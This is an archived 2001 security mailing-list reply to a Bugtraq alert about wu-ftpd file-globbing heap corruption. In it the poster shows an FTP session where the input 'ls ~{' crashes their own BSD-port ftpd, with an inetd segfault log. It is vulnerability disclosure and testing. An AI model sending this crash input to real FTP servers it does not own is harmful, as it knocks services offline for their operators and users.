Re: *ALERT* BID 3581: Wu-Ftpd File Globbing Heap Corruption Vulnerability

From: script0r (script0rat_private)
Date: Wed Nov 28 2001 - 15:36:19 PST

    -
    >                              Security Alert
    >
    > Subject:      Wu-Ftpd File Globbing Heap Corruption Vulnerability
    > BUGTRAQ ID:   3581                   CVE ID:         CVE-MAP-NOMATCH
    > Published:    Nov 27, 2001           Updated:        Nov 28, 2001
    > 01:12:56
    >
    > Remote:       Yes                    Local:          No
    > Availability: Always                 Authentication: Not Required
    > Credibility:  Vendor Confirmed       Ease:           No Exploit
    > Available Class:        Failure to Handle Exceptional Conditions
    >
    > Impact:   10.0           Severity: 10.0            Urgency:  8.2
    >
    > Last Change:  Initial analysis.

    I am running the a linux port of the bsd ftpd and it might be vulnerable to
    a similar attack,

    ftp localhost
    Connected to localhost.
    220 playlandFTP server (Version 6.5/OpenBSD, linux port 0.3.3) ready.
    Name (localhost:user): ftp
    331 Guest login ok, type your name as password.
    Password:
    230 Guest login ok, access restrictions apply.
    Remote system type is UNIX.
    Using binary mode to transfer files.
    ftp> ls ~{
    200 PORT command successful.
    421 Service not available, remote server has closed connection

    in inetd I find an error stating that the ftpd process has died unexpectedly

    Nov 28 14:21:28 playland inetd[82]: pid 16341: exit signal 11